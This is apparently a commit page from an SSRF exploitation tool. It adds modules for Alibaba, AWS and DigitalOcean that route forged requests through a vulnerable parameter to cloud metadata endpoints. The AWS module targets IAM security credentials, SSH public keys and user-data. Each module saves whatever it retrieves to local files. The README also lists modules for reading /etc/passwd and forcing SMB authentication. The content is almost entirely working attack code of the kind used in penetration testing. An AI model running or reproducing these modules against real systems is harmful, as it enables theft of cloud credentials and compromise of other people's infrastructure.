MODULE - Cloud services : alibaba, aws, digitalocean

lengyun123456 · Oct 18, 2018 · bb65e0f · bb65e0f
1 parent aec8eaa
commit bb65e0f
Show file tree

Hide file tree

Showing 4 changed files with 163 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -63,6 +63,9 @@ The following modules are already implemented and can be used with the `-m` argu
 | `portscan`     | Scan ports for the host |
 | `networkscan`  | HTTP Ping sweep over the network |
 | `readfiles`    | Read files such as `/etc/passwd` |
+| `alibaba`      | Read files from the provider (e.g: meta-data, user-data) |
+| `aws`          | Read files from the provider (e.g: meta-data, user-data) |
+| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
 | `socksproxy`   | SOCKS4 Proxy |
 | `smbhash`      | Force an SMB authentication via a UNC Path |
 

diff --git a/modules/alibaba.py b/modules/alibaba.py
@@ -0,0 +1,49 @@
+from core.utils import *
+import logging
+import os
+
+name          = "alibaba"
+description   = "Access sensitive data from the Alibaba Cloud"
+author        = "Swissky"
+documentation = [""]
+
+class exploit():
+    endpoints = set()
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+        self.add_endpoints()
+
+        r = requester.do_request(args.param, "")
+        if r != None:
+            default = r.text
+
+            # Create directory to store files
+            directory = requester.host
+            if not os.path.exists(directory):
+                os.makedirs(directory)
+
+            for endpoint in self.endpoints:
+                payload = wrapper_http(endpoint[1], endpoint[0] , "80")
+                r  = requester.do_request(args.param, payload)
+                diff = diff_text(r.text, default)
+                if diff != "":
+
+                    # Display diff between default and ssrf request
+                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    print(diff)
+
+                    # Write diff to a file
+                    filename = endpoint[1].split('/')[-1]
+                    if filename == "":
+                        filename = endpoint[1].split('/')[-2:-1][0]
+
+                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    with open(directory + "/" + filename, 'w') as f:
+                        f.write(diff)
+
+
+    def add_endpoints(self):
+        self.endpoints.add( ("100.100.100.200","latest/meta-data/instance-id") )
+        self.endpoints.add( ("100.100.100.200","latest/meta-data/image-id") )
+        self.endpoints.add( ("100.100.100.200","latest/meta-data/") )
diff --git a/modules/aws.py b/modules/aws.py
@@ -0,0 +1,62 @@
+from core.utils import *
+import logging
+import os
+
+name          = "aws"
+description   = "Access sensitive data from AWS"
+author        = "Swissky"
+documentation = [
+    "https://hackerone.com/reports/53088",
+    "https://hackerone.com/reports/285380",
+    "https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/"
+]
+
+class exploit():
+    endpoints = set()
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+        self.add_endpoints()
+
+        r = requester.do_request(args.param, "")
+        if r != None:
+            default = r.text
+
+            # Create directory to store files
+            directory = requester.host
+            if not os.path.exists(directory):
+                os.makedirs(directory)
+
+            for endpoint in self.endpoints:
+                payload = wrapper_http(endpoint[1], endpoint[0] , "80")
+                r  = requester.do_request(args.param, payload)
+                diff = diff_text(r.text, default)
+                if diff != "":
+
+                    # Display diff between default and ssrf request
+                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    print(diff)
+
+                    # Write diff to a file
+                    filename = endpoint[1].split('/')[-1]
+                    if filename == "":
+                        filename = endpoint[1].split('/')[-2:-1][0]
+
+                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    with open(directory + "/" + filename, 'w') as f:
+                        f.write(diff)
+
+
+    def add_endpoints(self):
+        self.endpoints.add( ("169.254.169.254/","latest/user-data") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/ami-id") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/reservation-id") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/hostname") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/public-keys/0/openssh-key") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/public-keys/1/openssh-key") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/public-keys/2/openssh-key") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/iam/security-credentials/dummy") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/iam/security-credentials/ecsInstanceRole") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/iam/security-credentials/") )
+        self.endpoints.add( ("169.254.169.254/","latest/meta-data/public-keys/") )
+        self.endpoints.add( ("169.254.169.254/","latest/user-data/") )
diff --git a/modules/digitalocean.py b/modules/digitalocean.py
@@ -0,0 +1,49 @@
+from core.utils import *
+import logging
+import os
+
+name          = "digitalocean"
+description   = "Access sensitive data from the Digital Ocean provider"
+author        = "Swissky"
+documentation = ["https://developers.digitalocean.com/documentation/metadata/"]
+
+class exploit():
+    endpoints = set()
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+        self.add_endpoints()
+
+        r = requester.do_request(args.param, "")
+        if r != None:
+            default = r.text
+
+            # Create directory to store files
+            directory = requester.host
+            if not os.path.exists(directory):
+                os.makedirs(directory)
+
+            for endpoint in self.endpoints:
+                payload = wrapper_http(endpoint[1], endpoint[0] , "80")
+                r  = requester.do_request(args.param, payload)
+                diff = diff_text(r.text, default)
+                if diff != "":
+
+                    # Display diff between default and ssrf request
+                    logging.info("\033[32mReading file\033[0m : {}".format(payload))
+                    print(diff)
+
+                    # Write diff to a file
+                    filename = endpoint[1].split('/')[-1]
+                    logging.info("\033[32mWriting file\033[0m : {} to {}".format(payload, directory + "/" + filename))
+                    with open(directory + "/" + filename, 'w') as f:
+                        f.write(diff)
+
+
+    def add_endpoints(self):
+        self.endpoints.add( ("169.254.169.254","metadata/v1/id") )
+        self.endpoints.add( ("169.254.169.254","metadata/v1/user-data") )
+        self.endpoints.add( ("169.254.169.254","metadata/v1/hostname") )
+        self.endpoints.add( ("169.254.169.254","metadata/v1/region") )
+        self.endpoints.add( ("169.254.169.254","metadata/v1/public-keys") )
+        self.endpoints.add( ("169.254.169.254","metadata/v1.json") )